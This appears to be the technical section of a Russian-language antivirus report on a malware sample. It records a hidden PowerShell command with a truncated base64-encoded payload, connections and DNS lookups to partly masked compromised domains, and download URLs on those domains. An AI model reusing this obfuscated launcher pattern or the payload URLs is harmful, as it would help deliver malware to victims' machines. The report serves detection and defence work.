Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAoACcAQwBIAG4AJwArACcAbgBzACcAKwAnAGEAZABhACcAKwAnAHMAZAAgAD0AIAAmACcAKwAnACgAJwArACcAMgByAE0AJwArACcAbgAnACsAJwAyAHIAJwArACcATQAnACsAJwArADIAcgAnACsAJwBNAGUAMgAnACsAJw...
- 'ki####lawfirm.com':80
- 'ki####lawfirm.com':443
- 'ga####cing.co.uk':80
- 's-####buki.co.jp':80
- 'le###piele.de':80
- 'fr####manmedia.nl':80
- http://ki####lawfirm.com/hM8W/
- http://s-####buki.co.jp/1blv/
- http://le###piele.de/FOOZ/
- http://fr####manmedia.nl/lwGS/
- 'ki####lawfirm.com':443
- DNS ASK ki####lawfirm.com
- DNS ASK ga####cing.co.uk
- DNS ASK s-####buki.co.jp
- DNS ASK le###piele.de
- DNS ASK fr####manmedia.nl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAoACcAQwBIAG4AJwArACcAbgBzACcAKwAnAGEAZABhACcAKwAnAHMAZAAgAD0AIAAmACcAKwAnACgAJwArACcAMgByAE0AJwArACcAbgAnACsAJwAyAHIAJwArACcATQAnACsAJwArADIAcgAnACsAJwBNAGUAMgAnACsAJw...' (со скрытым окном)